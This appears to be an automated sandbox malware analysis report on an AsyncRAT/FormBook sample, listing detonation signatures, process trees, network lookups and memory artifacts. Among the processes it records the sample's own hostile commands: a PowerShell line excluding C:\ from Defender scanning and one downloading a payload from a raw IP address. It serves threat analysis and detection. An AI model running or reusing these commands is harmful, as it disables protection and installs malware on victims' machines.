Malware Analysis Report

2024-09-22 07:11

Sample ID 240601-sykp2aff5w
Target Trojan;MSIL.FormBook.AFO!MTB.zip
SHA256 69811fd3a031d56a72428c7f3f74573b551c2dc9b5fb827fe6740a03eae55f31
Tags
asyncrat default fresh bootkit discovery execution persistence rat
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK Matrix

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral3

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

69811fd3a031d56a72428c7f3f74573b551c2dc9b5fb827fe6740a03eae55f31

Threat Level: Known bad

The file Trojan;MSIL.FormBook.AFO!MTB.zip was found to be: Known bad.

Malicious Activity Summary

asyncrat default fresh bootkit discovery execution persistence rat

AsyncRat

Downloads MZ/PE file

Command and Scripting Interpreter: PowerShell

Blocklisted process makes network request

Checks computer location settings

Uses the VBS compiler for execution

Loads dropped DLL

Executes dropped EXE

Legitimate hosting services abused for malware hosting/C2

Checks installed software on the system

Writes to the Master Boot Record (MBR)

Suspicious use of SetThreadContext

Unsigned PE

Enumerates physical storage devices

Program crash

Suspicious use of SetWindowsHookEx

Suspicious use of FindShellTrayWindow

Checks processor information in registry

Suspicious use of WriteProcessMemory

Suspicious behavior: AddClipboardFormatListener

Creates scheduled task(s)

Suspicious behavior: EnumeratesProcesses

Suspicious use of AdjustPrivilegeToken

Script User-Agent

Suspicious use of SendNotifyMessage

Enumerates system info in registry

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary

MITRE ATT&CK Matrix V13

Analysis: static1

Detonation Overview

Reported

2024-06-01 15:32

Signatures

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Analysis: behavioral2

Detonation Overview

Submitted

2024-06-01 15:32

Reported

2024-06-01 15:33

Platform

win10v2004-20240508-en

Max time kernel

43s

Max time network

34s

Command Line

"C:\Users\Admin\AppData\Local\Temp\Trojan;MSIL.FormBook.AFO!MTB.exe"

Signatures

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\Trojan;MSIL.FormBook.AFO!MTB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Trojan;MSIL.FormBook.AFO!MTB.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\Trojan;MSIL.FormBook.AFO!MTB.exe

"C:\Users\Admin\AppData\Local\Temp\Trojan;MSIL.FormBook.AFO!MTB.exe"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --field-trial-handle=4124,i,6166776566165096562,4582328833313060853,262144 --variations-seed-version --mojo-platform-channel-handle=4172 /prefetch:8

Network

Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 241.150.49.20.in-addr.arpa udp
US 8.8.8.8:53 97.90.14.23.in-addr.arpa udp
US 8.8.8.8:53 g.bing.com udp
US 204.79.197.237:443 g.bing.com tcp
US 8.8.8.8:53 23.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 237.197.79.204.in-addr.arpa udp
US 8.8.8.8:53 154.239.44.20.in-addr.arpa udp
US 8.8.8.8:53 57.169.31.20.in-addr.arpa udp
US 8.8.8.8:53 149.220.183.52.in-addr.arpa udp
US 8.8.8.8:53 86.23.85.13.in-addr.arpa udp
US 8.8.8.8:53 15.164.165.52.in-addr.arpa udp

Files

N/A

Analysis: behavioral3

Detonation Overview

Submitted

2024-06-01 15:32

Reported

2024-06-01 15:33

Platform

win10v2004-20240426-en

Max time kernel

46s

Max time network

35s

Command Line

"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\Пароли Chrome.csv"

Signatures

Checks processor information in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE N/A

Enumerates system info in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE N/A

Suspicious behavior: AddClipboardFormatListener

Description Indicator Process Target
N/A N/A C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE N/A

Processes

C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE

"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\Пароли Chrome.csv"

Network

Country Destination Domain Proto
US 8.8.8.8:53 roaming.officeapps.live.com udp
IE 52.109.76.243:443 roaming.officeapps.live.com tcp
US 8.8.8.8:53 240.76.109.52.in-addr.arpa udp
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 243.76.109.52.in-addr.arpa udp
US 8.8.8.8:53 80.90.14.23.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 154.239.44.20.in-addr.arpa udp
US 8.8.8.8:53 23.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 171.117.168.52.in-addr.arpa udp
US 8.8.8.8:53 241.150.49.20.in-addr.arpa udp
US 8.8.8.8:53 86.23.85.13.in-addr.arpa udp
US 8.8.8.8:53 56.126.166.20.in-addr.arpa udp

Files

memory/5064-0-0x00007FFB10F90000-0x00007FFB10FA0000-memory.dmp

memory/5064-1-0x00007FFB10F90000-0x00007FFB10FA0000-memory.dmp

memory/5064-2-0x00007FFB10F90000-0x00007FFB10FA0000-memory.dmp

memory/5064-3-0x00007FFB10F90000-0x00007FFB10FA0000-memory.dmp

memory/5064-4-0x00007FFB10F90000-0x00007FFB10FA0000-memory.dmp

memory/5064-5-0x00007FFB50FAD000-0x00007FFB50FAE000-memory.dmp

memory/5064-6-0x00007FFB50F10000-0x00007FFB51105000-memory.dmp

memory/5064-9-0x00007FFB50F10000-0x00007FFB51105000-memory.dmp

memory/5064-7-0x00007FFB50F10000-0x00007FFB51105000-memory.dmp

memory/5064-8-0x00007FFB50F10000-0x00007FFB51105000-memory.dmp

memory/5064-12-0x00007FFB50F10000-0x00007FFB51105000-memory.dmp

memory/5064-13-0x00007FFB50F10000-0x00007FFB51105000-memory.dmp

memory/5064-15-0x00007FFB50F10000-0x00007FFB51105000-memory.dmp

memory/5064-14-0x00007FFB50F10000-0x00007FFB51105000-memory.dmp

memory/5064-16-0x00007FFB50F10000-0x00007FFB51105000-memory.dmp

memory/5064-11-0x00007FFB50F10000-0x00007FFB51105000-memory.dmp

memory/5064-10-0x00007FFB0EF30000-0x00007FFB0EF40000-memory.dmp

memory/5064-17-0x00007FFB0EF30000-0x00007FFB0EF40000-memory.dmp

memory/5064-18-0x00007FFB50F10000-0x00007FFB51105000-memory.dmp

memory/5064-35-0x00007FFB50F10000-0x00007FFB51105000-memory.dmp

Analysis: behavioral1

Detonation Overview

Submitted

2024-06-01 15:32

Reported

2024-06-01 15:33

Platform

win10v2004-20240426-en

Max time kernel

41s

Max time network

47s

Command Line

"C:\Users\Admin\AppData\Local\Temp\New Text Document.exe"

Signatures

AsyncRat

rat asyncrat

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Downloads MZ/PE file

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-4018855536-2201274732-320770143-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\New Text Document.exe N/A

Uses the VBS compiler for execution

Checks installed software on the system

discovery

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A iplogger.com N/A N/A
N/A raw.githubusercontent.com N/A N/A
N/A raw.githubusercontent.com N/A N/A
N/A iplogger.com N/A N/A

Writes to the Master Boot Record (MBR)

bootkit persistence
Description Indicator Process Target
File opened for modification \??\PhysicalDrive0 C:\Users\Admin\AppData\Local\Temp\a\360TS_Setup_Mini_WW.Peter.CPI202405_6.6.0.1060.exe N/A

Enumerates physical storage devices

Creates scheduled task(s)

persistence
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A

Enumerates system info in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Script User-Agent

Description Indicator Process Target
HTTP User-Agent header Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) N/A N/A
HTTP User-Agent header Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) N/A N/A

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\New Text Document.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\a\volumeinfo.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeManageVolumePrivilege N/A C:\Users\Admin\AppData\Local\Temp\a\360TS_Setup_Mini_WW.Peter.CPI202405_6.6.0.1060.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\a\55.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a\360TS_Setup_Mini_WW.Peter.CPI202405_6.6.0.1060.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Suspicious use of SendNotifyMessage

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\a\55.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a\360TS_Setup_Mini_WW.Peter.CPI202405_6.6.0.1060.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2960 wrote to memory of 3624 N/A C:\Users\Admin\AppData\Local\Temp\New Text Document.exe C:\Users\Admin\AppData\Local\Temp\a\volumeinfo.exe
PID 2960 wrote to memory of 3624 N/A C:\Users\Admin\AppData\Local\Temp\New Text Document.exe C:\Users\Admin\AppData\Local\Temp\a\volumeinfo.exe
PID 2960 wrote to memory of 3624 N/A C:\Users\Admin\AppData\Local\Temp\New Text Document.exe C:\Users\Admin\AppData\Local\Temp\a\volumeinfo.exe
PID 2960 wrote to memory of 4508 N/A C:\Users\Admin\AppData\Local\Temp\New Text Document.exe C:\Users\Admin\AppData\Local\Temp\a\55.exe
PID 2960 wrote to memory of 4508 N/A C:\Users\Admin\AppData\Local\Temp\New Text Document.exe C:\Users\Admin\AppData\Local\Temp\a\55.exe
PID 2960 wrote to memory of 4508 N/A C:\Users\Admin\AppData\Local\Temp\New Text Document.exe C:\Users\Admin\AppData\Local\Temp\a\55.exe
PID 2960 wrote to memory of 3200 N/A C:\Users\Admin\AppData\Local\Temp\New Text Document.exe C:\Users\Admin\AppData\Local\Temp\a\3.exe
PID 2960 wrote to memory of 3200 N/A C:\Users\Admin\AppData\Local\Temp\New Text Document.exe C:\Users\Admin\AppData\Local\Temp\a\3.exe
PID 2960 wrote to memory of 3200 N/A C:\Users\Admin\AppData\Local\Temp\New Text Document.exe C:\Users\Admin\AppData\Local\Temp\a\3.exe
PID 2960 wrote to memory of 4440 N/A C:\Users\Admin\AppData\Local\Temp\New Text Document.exe C:\Users\Admin\AppData\Local\Temp\a\munqk.exe
PID 2960 wrote to memory of 4440 N/A C:\Users\Admin\AppData\Local\Temp\New Text Document.exe C:\Users\Admin\AppData\Local\Temp\a\munqk.exe
PID 2960 wrote to memory of 4440 N/A C:\Users\Admin\AppData\Local\Temp\New Text Document.exe C:\Users\Admin\AppData\Local\Temp\a\munqk.exe
PID 2960 wrote to memory of 2276 N/A C:\Users\Admin\AppData\Local\Temp\New Text Document.exe C:\Users\Admin\AppData\Local\Temp\a\17.exe
PID 2960 wrote to memory of 2276 N/A C:\Users\Admin\AppData\Local\Temp\New Text Document.exe C:\Users\Admin\AppData\Local\Temp\a\17.exe
PID 2960 wrote to memory of 2276 N/A C:\Users\Admin\AppData\Local\Temp\New Text Document.exe C:\Users\Admin\AppData\Local\Temp\a\17.exe
PID 3200 wrote to memory of 2804 N/A C:\Users\Admin\AppData\Local\Temp\a\3.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
PID 3200 wrote to memory of 2804 N/A C:\Users\Admin\AppData\Local\Temp\a\3.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
PID 3200 wrote to memory of 2804 N/A C:\Users\Admin\AppData\Local\Temp\a\3.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
PID 3200 wrote to memory of 2804 N/A C:\Users\Admin\AppData\Local\Temp\a\3.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
PID 3200 wrote to memory of 2804 N/A C:\Users\Admin\AppData\Local\Temp\a\3.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
PID 3200 wrote to memory of 2804 N/A C:\Users\Admin\AppData\Local\Temp\a\3.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
PID 3200 wrote to memory of 2804 N/A C:\Users\Admin\AppData\Local\Temp\a\3.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
PID 3200 wrote to memory of 2804 N/A C:\Users\Admin\AppData\Local\Temp\a\3.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
PID 2276 wrote to memory of 3248 N/A C:\Users\Admin\AppData\Local\Temp\a\17.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2276 wrote to memory of 3248 N/A C:\Users\Admin\AppData\Local\Temp\a\17.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2276 wrote to memory of 3248 N/A C:\Users\Admin\AppData\Local\Temp\a\17.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2960 wrote to memory of 4832 N/A C:\Users\Admin\AppData\Local\Temp\New Text Document.exe C:\Users\Admin\AppData\Local\Temp\a\network.exe
PID 2960 wrote to memory of 4832 N/A C:\Users\Admin\AppData\Local\Temp\New Text Document.exe C:\Users\Admin\AppData\Local\Temp\a\network.exe
PID 2960 wrote to memory of 4832 N/A C:\Users\Admin\AppData\Local\Temp\New Text Document.exe C:\Users\Admin\AppData\Local\Temp\a\network.exe
PID 2960 wrote to memory of 1004 N/A C:\Users\Admin\AppData\Local\Temp\New Text Document.exe C:\Users\Admin\AppData\Local\Temp\a\maikati.exe
PID 2960 wrote to memory of 1004 N/A C:\Users\Admin\AppData\Local\Temp\New Text Document.exe C:\Users\Admin\AppData\Local\Temp\a\maikati.exe
PID 2960 wrote to memory of 1004 N/A C:\Users\Admin\AppData\Local\Temp\New Text Document.exe C:\Users\Admin\AppData\Local\Temp\a\maikati.exe
PID 4832 wrote to memory of 3148 N/A C:\Users\Admin\AppData\Local\Temp\a\network.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 4832 wrote to memory of 3148 N/A C:\Users\Admin\AppData\Local\Temp\a\network.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 4832 wrote to memory of 3148 N/A C:\Users\Admin\AppData\Local\Temp\a\network.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 4832 wrote to memory of 3148 N/A C:\Users\Admin\AppData\Local\Temp\a\network.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 4832 wrote to memory of 3148 N/A C:\Users\Admin\AppData\Local\Temp\a\network.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 2960 wrote to memory of 4732 N/A C:\Users\Admin\AppData\Local\Temp\New Text Document.exe C:\Users\Admin\AppData\Local\Temp\a\Zinker.exe
PID 2960 wrote to memory of 4732 N/A C:\Users\Admin\AppData\Local\Temp\New Text Document.exe C:\Users\Admin\AppData\Local\Temp\a\Zinker.exe
PID 2960 wrote to memory of 4732 N/A C:\Users\Admin\AppData\Local\Temp\New Text Document.exe C:\Users\Admin\AppData\Local\Temp\a\Zinker.exe
PID 4732 wrote to memory of 4620 N/A C:\Users\Admin\AppData\Local\Temp\a\Zinker.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 4732 wrote to memory of 4620 N/A C:\Users\Admin\AppData\Local\Temp\a\Zinker.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 4732 wrote to memory of 4620 N/A C:\Users\Admin\AppData\Local\Temp\a\Zinker.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 4732 wrote to memory of 648 N/A C:\Users\Admin\AppData\Local\Temp\a\Zinker.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 4732 wrote to memory of 648 N/A C:\Users\Admin\AppData\Local\Temp\a\Zinker.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 4732 wrote to memory of 648 N/A C:\Users\Admin\AppData\Local\Temp\a\Zinker.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 4732 wrote to memory of 4556 N/A C:\Users\Admin\AppData\Local\Temp\a\Zinker.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 4732 wrote to memory of 4556 N/A C:\Users\Admin\AppData\Local\Temp\a\Zinker.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 4732 wrote to memory of 4556 N/A C:\Users\Admin\AppData\Local\Temp\a\Zinker.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 4732 wrote to memory of 3380 N/A C:\Users\Admin\AppData\Local\Temp\a\Zinker.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 4732 wrote to memory of 3380 N/A C:\Users\Admin\AppData\Local\Temp\a\Zinker.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 4732 wrote to memory of 3380 N/A C:\Users\Admin\AppData\Local\Temp\a\Zinker.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 4732 wrote to memory of 3380 N/A C:\Users\Admin\AppData\Local\Temp\a\Zinker.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 4732 wrote to memory of 3380 N/A C:\Users\Admin\AppData\Local\Temp\a\Zinker.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 4732 wrote to memory of 3380 N/A C:\Users\Admin\AppData\Local\Temp\a\Zinker.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 4732 wrote to memory of 3380 N/A C:\Users\Admin\AppData\Local\Temp\a\Zinker.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 4732 wrote to memory of 3380 N/A C:\Users\Admin\AppData\Local\Temp\a\Zinker.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 4732 wrote to memory of 3380 N/A C:\Users\Admin\AppData\Local\Temp\a\Zinker.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 4732 wrote to memory of 3380 N/A C:\Users\Admin\AppData\Local\Temp\a\Zinker.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 4732 wrote to memory of 3380 N/A C:\Users\Admin\AppData\Local\Temp\a\Zinker.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 4732 wrote to memory of 3380 N/A C:\Users\Admin\AppData\Local\Temp\a\Zinker.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 2960 wrote to memory of 4204 N/A C:\Users\Admin\AppData\Local\Temp\New Text Document.exe C:\Users\Admin\AppData\Local\Temp\a\smartsoftsignew.exe
PID 2960 wrote to memory of 4204 N/A C:\Users\Admin\AppData\Local\Temp\New Text Document.exe C:\Users\Admin\AppData\Local\Temp\a\smartsoftsignew.exe
PID 2960 wrote to memory of 4204 N/A C:\Users\Admin\AppData\Local\Temp\New Text Document.exe C:\Users\Admin\AppData\Local\Temp\a\smartsoftsignew.exe

Processes

C:\Users\Admin\AppData\Local\Temp\New Text Document.exe

"C:\Users\Admin\AppData\Local\Temp\New Text Document.exe"

C:\Users\Admin\AppData\Local\Temp\a\volumeinfo.exe

"C:\Users\Admin\AppData\Local\Temp\a\volumeinfo.exe"

C:\Users\Admin\AppData\Local\Temp\a\55.exe

"C:\Users\Admin\AppData\Local\Temp\a\55.exe"

C:\Users\Admin\AppData\Local\Temp\a\3.exe

"C:\Users\Admin\AppData\Local\Temp\a\3.exe"

C:\Users\Admin\AppData\Local\Temp\a\munqk.exe

"C:\Users\Admin\AppData\Local\Temp\a\munqk.exe"

C:\Users\Admin\AppData\Local\Temp\a\17.exe

"C:\Users\Admin\AppData\Local\Temp\a\17.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -Command Add-MpPreference -ExclusionPath 'C:\'

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 2804 -ip 2804

C:\Users\Admin\AppData\Local\Temp\a\network.exe

"C:\Users\Admin\AppData\Local\Temp\a\network.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2804 -s 12

C:\Users\Admin\AppData\Local\Temp\a\maikati.exe

"C:\Users\Admin\AppData\Local\Temp\a\maikati.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

-arguments

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 504 -p 4832 -ip 4832

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4832 -s 612

C:\Users\Admin\AppData\Local\Temp\a\Zinker.exe

"C:\Users\Admin\AppData\Local\Temp\a\Zinker.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"

C:\Users\Admin\AppData\Local\Temp\a\smartsoftsignew.exe

"C:\Users\Admin\AppData\Local\Temp\a\smartsoftsignew.exe"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /C cd "C:\Users\Admin\AppData\Local\Temp\putty" & "Smartscreen.bat"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "(New-Object Net.WebClient).DownloadFile('http://94.103.188.126/jerry/putty.zip', 'C:\Users\Admin\AppData\Local\Temp\putty.zip')"

C:\Users\Admin\AppData\Local\Temp\a\ADServices.exe

"C:\Users\Admin\AppData\Local\Temp\a\ADServices.exe"

C:\Users\Admin\AppData\Local\Temp\a\New.exe

"C:\Users\Admin\AppData\Local\Temp\a\New.exe"

C:\Users\Admin\AppData\Local\Temp\a\360TS_Setup_Mini_WW.Peter.CPI202405_6.6.0.1060.exe

